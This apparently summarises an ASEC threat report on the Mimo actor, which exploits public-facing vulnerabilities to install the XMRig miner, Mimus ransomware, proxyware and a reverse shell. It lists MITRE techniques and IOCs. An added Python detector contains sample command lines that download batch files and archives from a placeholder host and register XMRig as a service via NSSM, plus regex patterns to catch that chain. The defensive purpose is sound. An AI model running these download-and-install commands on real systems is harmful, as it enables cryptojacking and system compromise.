Mimo CoinMiner and Mimus Ransomware Installed via Vulnerability Attacks – ASEC BLOG

The article documents how the Mimo threat actor exploits a range of public-facing vulnerabilities to install malware, including CoinMiners, Mimus ransomware, proxyware, and reverse shell tools. It also details the intrusion chain, from initial exploitation to encryption and monetization, plus observed IOCs and recommended defenses. #Mimo #Mimus #MauriCrypt #XMRig #Log4Shell #Confluence #ActiveMQ #PaperCut #NHAS #Tor

Keypoints

  • Multiple vulnerabilities have been used by Mimo (Hezb) since 2022 to install CoinMiners and other malware (Log4Shell CVE-2021-44228; WSO2 RCE CVE-2022-29464; Confluence CVE-2022-26134; PaperCut CVE-2023-27350; ActiveMQ CVE-2023-46604).
  • Early activity included exploiting Atlassian Confluence servers to drop the XMRig miner; VMware Horizon targets with unpatched Log4Shell remain at risk.
  • PowerShell is used in vulnerability-driven attacks to fetch and execute batch scripts (lnl.bat, kill.bat), which then download and run the miner via dom.zip/dom-6.zip.
  • The miner chain often uses NSSM to install XMRig as a Windows service, enabling persistence and ongoing mining.
  • Mimo attackers also deployed Mimus ransomware (MauriCrypt) based on open-source code, encrypting many file types with AES-256 and appending the .encrypted extension.
  • Proxyware and reverse shell tools were observed at the same addresses used for the miner, suggesting proxyjacking and additional monetization paths.
  • NHAS reverse shell (reverse_ssh) provides basic command execution and port forwarding, enabling continued control over compromised hosts.
  • Defensive recommendations emphasize patching, restricting external-access services, and updating to latest versions (e.g., V3) to block known exploits.
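The miner chain in the keypoints (PowerShell fetches lnl.bat/kill.bat, the batch script pulls dom.zip or dom-6.zip, 7z extracts it, NSSM registers XMRig as a service) can be hunted for as a sequence rather than as single commands. The detector below is an added example, not code from the ASEC report: it runs over constructed process-creation events (hypothetical hosts, TEST-NET IP and service name, none taken from the article) and flags a host only when several distinct stages of the chain appear.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (hypothetical; the IP, hosts and
# service name are placeholders, not indicators from the report).
SAMPLE_EVENTS = [
    {"host": "web01", "cmdline": r'powershell.exe -NoP -c "iwr http://203.0.113.10/lnl.bat -OutFile C:\Windows\Temp\lnl.bat"'},
    {"host": "web01", "cmdline": r"cmd.exe /c C:\Windows\Temp\lnl.bat"},
    {"host": "web01", "cmdline": r"curl.exe -o C:\Windows\Temp\dom-6.zip http://203.0.113.10/dom-6.zip"},
    {"host": "web01", "cmdline": r"7z.exe x C:\Windows\Temp\dom-6.zip -oC:\Windows\Temp\dom"},
    {"host": "web01", "cmdline": r"nssm.exe install HypotheticalSvc C:\Windows\Temp\dom\xmrig.exe"},
    # Benign admin activity on another host: 7z and NSSM alone should not alert.
    {"host": "build02", "cmdline": r"7z.exe x release.zip -orelease"},
    {"host": "build02", "cmdline": r"nssm.exe install jenkins-agent C:\agent\agent.exe"},
]

# One regex per stage of the chain described in the keypoints, matched on the command line.
STAGES = {
    "T1059.001 PowerShell fetches lnl.bat/kill.bat": re.compile(r"powershell.*\b(lnl|kill)\.bat\b", re.I),
    "T1105 dom.zip/dom-6.zip transfer":              re.compile(r"\bdom(-6)?\.zip\b", re.I),
    "7z extracts dom archive":                       re.compile(r"\b7z(\.exe)?\b.*\bdom(-6)?\.zip\b", re.I),
    "T1543.003 NSSM installs XMRig service":         re.compile(r"\bnssm(\.exe)?\b.*\binstall\b.*\bxmrig", re.I),
}


def stages_per_host(events):
    """Return {host: set of stage names observed} over the given events."""
    hits = defaultdict(set)
    for ev in events:
        for name, pattern in STAGES.items():
            if pattern.search(ev["cmdline"]):
                hits[ev["host"]].add(name)
    return hits


def flag_hosts(events, min_stages=2):
    """Hosts on which at least min_stages distinct stages of the chain were seen.
    Requiring more than one stage keeps a lone '7z x' or 'nssm install' from alerting."""
    return {h: sorted(s) for h, s in stages_per_host(events).items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, stages in flag_hosts(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(stages))
```

Feed it the command-line field of your own process-creation telemetry (Sysmon event 1 or Security event 4688 with command-line auditing enabled) and tune min_stages to the noise level of the environment.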

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The actor exploited public vulnerabilities (e.g., Log4Shell CVE-2021-44228) to install CoinMiner. [The first known activity … the exploitation of the Log4Shell vulnerability (CVE-2021-44228) …]
  • [T1059.001] PowerShell – PowerShell is used to execute vulnerability-driven actions and download Batch malware. [The Powershell executed through the vulnerability attacks is executed by downloading the Batch malware. …]
  • [T1105] Ingress Tool Transfer – Batch malware downloads and executes additional tools (dom.zip/dom-6.zip) to deploy the miner. [The Batch malware downloads the “dom.zip” or “dom-6.zip” compressed file …]
  • [T1560.001] Archive Collected Data – Decompression of downloaded archives using 7z to extract XMRig and NSSM components. [decompresses it using the 7z tool]
  • [T1543.003] Create or Modify System Process: Windows Service – NSSM is used to install XMRig as a service. [The Batch script uses the NSSM afterwards to register XMRig as a service.]
  • [T1486] Data Encrypted for Impact – Mimus ransomware encrypts files (AES-256) with a .encrypted extension. [Encryption algorithm AES-256 CTR … Encryption extension .encrypted]
  • [T1090] Proxy – Proxyware and Tor-based communications are used to obscure traffic and monetize via proxying. [Proxyware is a program that shares a part of the Internet bandwidth …]
  • [T1090.001] Proxy – Tor-based C2 communications are used to connect to the C2 server. [downloaded Tor Browser to connect to the C&C server via the browser]
  • [T1021.004] Remote Services – Reverse SSH (NHAS) uses SSH for C2 communications and remote control. [The reverse shell … uses the SSH protocol to communicate with the C&C server]
  • [T1071.001] Web Protocols – C2 URLs and domains are used for command and control (e.g., hxxp://windows.n1tro[.]cyou:4544). [C&C URL – hxxp://windows.n1tro[.]cyou:4544]
  • [T1132] Data Encoding – Filenames and indicators are Base64-encoded in the ransomware configuration. [files with the specified extensions … are encoded in Base64 and their extensions changed to “.encrypted”]

Indicators of Compromise

  • [IOC Type] Domains and URLs – C2: windows.n1tro.cyou:4544; download and exploit URLs such as dom.zip, dom-6.zip, poc-win.xml, lnl.bat, kill.bat, etc.
  • [IOC Type] IP Addresses – 102.130.112.157:3232 (NHAS reverse shell C2), 50.19.48.59:82 (additional download C2).
  • [IOC Type] Bitcoins Wallets – 15Jz1fmreZx9wG93DKjTXMhuLpPpCgvEQk, 46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN
  • [IOC Type] Wallet Addresses Context – Used by threat actor for ransom payments and decryption tool purchases (e.g., decryption tool site).
  • [IOC Type] Email Address – [email protected]
  • [IOC Type] Files/Hashes – 618680a68eb6ac79f530a0291ad29d9f; 5e0f18dfe16f274d34716d011e0a3f39; (and 6 more hashes)
  • [IOC Type] Decryption Tool Site – https://satoshidisk[.]com/pay/CIIRg6

Read more: https://asec.ahnlab.com/en/60440/